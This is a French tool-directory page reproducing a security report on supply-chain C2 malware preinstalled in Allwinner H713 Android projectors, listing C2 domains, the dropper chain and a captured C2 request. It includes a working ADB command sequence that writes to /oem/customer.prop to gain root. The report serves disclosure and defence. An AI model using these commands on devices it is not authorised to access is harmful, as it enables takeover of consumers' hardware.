Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Android-Projector-C2-Malware — Analyse d'un réseau C2 de beamers chinois - SilentSDK-Analysis | Kitploit
Outils/GitHubGitHub/kavan00/android-projector-c2-malware
Sécurité AndroidSécurité des Systèmes EmbarquésGestion des Indicateurs de Compromission (IOC)Sécurité IoTCriminalistique RéseauRétro-ingénierieAnalyse de MalwareCriminalistique NumériqueCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Renseignement sur les Menaces
Sécurité de la Chaîne Logistique
Analyse de Micrologiciel
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Analyse d'un réseau C2 de beamers chinois - SilentSDK-Analysis

Voir le dépôt
18265il y a 5 moisPas encore vérifié
Partager

Infrastructure C2 pré-installée et charge utile RAT sur les projecteurs Android

Rapport d'analyse technique — Recherche en sécurité


Appareils concernés : De multiples projecteurs Android de marques de projecteurs comme Nonete (par ex., modèle HY260Pro) (probablement aussi plusieurs projecteurs de Magcubic, Hotack, Huyukang et bien d'autres, car ces entreprises distribuent des modèles similaires et des indications le confirment)
Plateforme de chipset : Allwinner H713 / sun50iw12p1 — potentiellement affecte tous les appareils de cette plateforme
Période d'analyse : 11–17 avril 2026
Classification : Infrastructure de commande et de contrôle pré-installée avec charge utile de cheval de Troie d'accès à distance


TL;DR

  • Le problème : De nombreux projecteurs Android bon marché (potentiellement des marques comme Magcubic, Hotack, etc., utilisant la puce Allwinner H713), actuellement vendus en masse sur Amazon, eBay et AliExpress, sont infectés par un malware directement depuis l'usine (attaque de la chaîne d'approvisionnement, similaire aux cas « BADBOX »).
  • Le mécanisme : Une application système apparemment inoffensive (« StoreOS ») agit comme un dropper déguisé. Elle télécharge complètement silencieusement en arrière-plan un dropper de deuxième étape nommé « SilentSDK » et l'installe avec les privilèges système maximum, qui à son tour installe un framework RAT modulaire, basé sur des plugins et conscient de l'architecture, et éventuellement un framework de phishing.
  • Le danger : Le malware établit une connexion C2 vers la Chine (api.pixelpioneerss.com), extrait des identifiants d'appareil sensibles, et peut télécharger et exécuter à tout moment du code malveillant supplémentaire arbitraire avec les privilèges root (chmod 777). De plus, les appareils présentent des backdoors root ouvertes.
  • Mesure d'atténuation immédiate : Les domaines C2 (notamment *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) doivent être bloqués au niveau réseau. Les utilisateurs concernés ne peuvent désactiver manuellement les applications malveillantes que via ADB, car elles sont profondément intégrées dans le système.

Avis d'urgence

L'infrastructure malveillante documentée dans ce rapport est pré-installée sur des projecteurs Android actuellement vendus en grande quantité aux consommateurs finaux sur Amazon, eBay et AliExpress. Les appareils concernés couvrent peut-être plusieurs noms de marque (Hotack, Huyukang, Magcubic, Nonete, entre autres). Une infrastructure C2 identique a été confirmée indépendamment sur d'autres appareils du même fabricant (voir section 13). Le schéma correspond aux cas BADBOX.


Table des matières

  1. Identification de l'appareil
  2. Flux de travail de l'investigation
  3. Accès root — Chemin d'exploitation
  4. Réponse du serveur C2 — Preuve principale
  5. Aperçu de l'écosystème du malware
  6. StoreOS — Analyse du dropper (com.htc.storeos)
  7. EventUploadService — Télémétrie (com.htc.eventuploadservice)
  8. ExpandSDK — Injection de publicités (com.htc.expandsdk)
  9. SilentSDK — Analyse du dropper de deuxième étape (com.hotack.silentsdk)
  10. Le malware
  11. Backdoors système
  12. Forensique réseau
  13. Usurpation d'appareil (usurpation d'empreinte de build)
  14. Confirmation externe
  15. Indicateurs de compromission (IOC)
  16. Cartographie MITRE ATT&CK
  17. Mesures d'atténuation immédiates
  18. Sources

Appareil acheté : Lien Amazon - Nonete Mini Beamer 4K 1080P


1. Identification de l'appareil

PropriétéValeur
Nom de marqueNonete HY260Pro (modèle vendu par plusieurs entreprises)
Nom du modèle interneNT10
SoCAllwinner sun50iw12p1 (ARM 32 bits)
Système d'exploitationSpectraOS (Android 11, noyau 5.4.99)
Empreinte de build réelleAllwinner/h713_tuna_p3/h713-tuna_p3:11
Empreinte de build usurpéeADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissif (aucune application)
Clé de signature de plateformeClé de test publique AOSP
Certificat OEMCN=蓝鲨, OU=www.bsh.me, C=CN
Canal du firmwareHY260Pro_SpectraOS_TPYB

Remarque sur la portée : Le chipset Allwinner H713 est intégré dans de nombreux projecteurs Android bon marché vendus sous des noms de marque changeants sur le marché européen. La base de firmware identique (h713_tuna_p3) et l'opérateur C2 identique (Shenzhen Aodin Technology) suggèrent fortement que tous les appareils de cet OEM contiennent la même infrastructure.


2. Flux de travail de l'investigation

ÉtapeActionRésultat
1Capture du trafic réseau avec WiresharkTrafic HTTP vers store-api.aodintech.com
2Décodage de la réponse C2 compressée en gzip7 applications, dont « SilentTools » cachée
3Déchiffrement AES-CBC du chemin de téléchargementClé [REDACTED], URL vers fichier .bpp
4Exploitation root via /oem/customer.propuid=0(root) après injection de propriété
5Extraction forensique de /data, /oem, /systemAPK, bases de données, configurations
6Analyse statique du DEX de StoreOSpm install -r -d, protection par inversion d'octets
7Rétro-ingénierie du mécanisme reverseLenCompréhension de la protection anti-analyse
8Contournement de la protection par inversion d'octetsDEX SilentSDK déchiffré et analysable
9Déchiffrement XOR des chaînes de SilentSDKDomaine C2 api.pixelpioneerss.com confirmé
10Vérification de hachage sur trois sourcesMD5/SHA-256 correspondent parfaitement
11Rétro-ingénierie du processus de téléchargement du malwareServeurs toujours en ligne
12Rétro-ingénierie du malwareFramework RAT basé sur des plugins

3. Accès root — Chemin d'exploitation

L'accès root a été obtenu grâce à une combinaison de trois vulnérabilités :

  1. SELinux Permissif — Les violations d'accès sont seulement journalisées, pas bloquées.
  2. /oem accessible en écriture mondiale — La partition est montée en FAT avec fmask=0000.
  3. customer.prop chargé au démarrage — Écrase les propriétés système.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Impact :** Tout utilisateur ayant un accès physique ou un attaquant sur le même réseau (via ADB, port 5555 ouvert, sans authentification) obtient un accès root complet.

---

## 4. Réponse du serveur C2 — Preuve principale

### Requête HTTP capturée```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Réponse du serveur (décodée depuis pcapng - Tableau)

La réponse compressée en gzip contient une liste JSON de sept applications. Six d'entre elles sont des applications de streaming classiques (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). La septième est SilentTools :

Télécharger l’outil